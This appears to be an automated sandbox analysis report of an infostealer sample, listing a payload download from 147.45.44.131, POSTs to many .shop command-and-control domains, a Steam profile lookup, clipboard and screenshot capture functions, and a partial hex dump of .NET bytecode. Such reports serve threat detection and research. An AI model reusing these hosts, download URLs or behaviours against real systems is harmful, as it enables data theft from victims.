00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a ce 28 14 00 00 0a 72 4e 93 00 70 28 15 00 00 0a 6f 16 00 00 0a 80 01 00 00 04 28 14 00 00 0a 72 f9 93 00 70 28 15 00 00 0a 6f 16 00 00 0a 80 02 00 00 04 2a 56 7e 01 00 00 04 72 43 94 00 70 28 15 00 00 0a 28 03 00 00 06 2a 00 00 13 30 05 00 63 00 00 00 01 00 00 11 28 0f 00 00 0a 03 6f 10 00 00 0a 0a 02 02 8e 69 17 59 91 1f 70 61 0b 02 8e 69 8d 12 00 00 01 0c 16 0d 16 13 04 2b 27 08 11 04 02 11 04 91 07 61 06 09 91 61 d2 9c 09 03 6f 11 00 00 0a 17 59 2e 05 09 17 58 2b 01 16 0d 11 04 17 58 13 04 11 04 02 8e 69 32 d2 12 02 02 8e 69 17 59 28 01 00 00 2b 08 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 14 00 00 0a 72 01 00 00 70 28 15 00 00 0a 6f 16 00 00 0a 28 15 00 00 0a 7e 02 00 00 04 28 01 00 00 06 0a 28 14 00 00 0a 06 6f 16 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 14 00 00 0a 72 be 92 00 70 28 15 00 00 0a 6f 16 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /files/gqgqg.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.4.136 104.21.4.136
Source: Joe Sandbox View IP Address: 147.45.44.131 147.45.44.131
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ptramidermsnqj.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /files/gqgqg.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.yu equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.yu equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: tps://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: ptramidermsnqj.shop
Source: global traffic DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ptramidermsnqj.shop
Source: file.exe String found in binary or memory: http://.css
Source: file.exe String found in binary or memory: http://.jpg
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000001.00000002.1735747000.00000000048F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.131
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.131/files/gqgqg.exe
Source: powershell.exe, 00000001.00000002.1741341041.0000000007079000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: file.exe String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1735747000.0000000004641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: file.exe String found in binary or memory: https://aka.ms/binaryformatter
Source: file.exe String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Path:
Source: file.exe String found in binary or memory: https://aka.ms/dotnet-core-applaunch?openGetWindowsDirectory
Source: file.exe String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: file.exe String found in binary or memory: https://aka.ms/dotnet-illink/com)
Source: file.exe String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: file.exe String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: file.exe String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: file.exe String found in binary or memory: https://aka.ms/dotnet/download
Source: file.exe String found in binary or memory: https://aka.ms/dotnet/infopath-to-application:Usage:
Source: file.exe String found in binary or memory: https://aka.ms/dotnet/sdk-not-foundInstall
Source: file.exe String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000001.00000002.1735747000.0000000004641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ballotnwu.site/apiA
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ballotnwu.site/apiQ
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fragnantbui.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ghostreedmnu.shop/apiB
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe String found in binary or memory: https://github.com/dotnet/runtime
Source: powershell.exe, 00000001.00000002.1735747000.0000000004F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://offensivedzvju.shop/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ptramidermsnqj.shop/api
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ptramidermsnqj.shop/llh
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://reinforcenh.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.yu
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/y
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stogeneratmns.shop/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stogeneratmns.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vozmeatillu.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 104.21.83.105:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.4:49741 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004380A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_004380A0
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_004380A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_004380A0
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00438220 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 5_2_00438220

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
.NET source code contains very large strings
Source: 1.2.powershell.exe.8110000.5.raw.unpack, Program.cs Long String: Length: 478552
Source: 1.2.powershell.exe.8110000.5.raw.unpack, SWFT.cs Long String: Length: 18780
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, Program.cs Long String: Length: 478552
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, SWFT.cs Long String: Length: 18780
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00713220 0_2_00713220
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009B3200 0_2_009B3200
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008278C0 0_2_008278C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AEA80 0_2_009AEA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B75BF0 0_2_00B75BF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007EDCE0 0_2_007EDCE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009210C0 0_2_009210C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00781020 0_2_00781020
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F1260 0_2_007F1260
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007FF2D0 0_2_007FF2D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00832250 0_2_00832250
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008BE3A0 0_2_008BE3A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A32330 0_2_00A32330
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2A370 0_2_00A2A370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007DB390 0_2_007DB390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A284C0 0_2_00A284C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008DB420 0_2_008DB420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007F6480 0_2_007F6480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C07580 0_2_00C07580
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A215E0 0_2_00A215E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C10570 0_2_00C10570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B66F0 0_2_007B66F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E96C0 0_2_007E96C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007596A0 0_2_007596A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A347F0 0_2_00A347F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A338B0 0_2_00A338B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007D6850 0_2_007D6850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D7A00 0_2_009D7A00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A34A60 0_2_00A34A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E9A80 0_2_007E9A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EEBC0 0_2_009EEBC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00733C60 0_2_00733C60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008C2C30 0_2_008C2C30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A34D80 0_2_00A34D80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A18D90 0_2_00A18D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007D0E60 0_2_007D0E60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2CEF0 0_2_00A2CEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A21E20 0_2_00A21E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007BAF70 0_2_007BAF70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A23FE0 0_2_00A23FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00770F00 0_2_00770F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A79F30 0_2_00A79F30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B77F00 0_2_00B77F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05449D8B 0_2_05449D8B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05445911 0_2_05445911
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_0041050F 5_2_0041050F
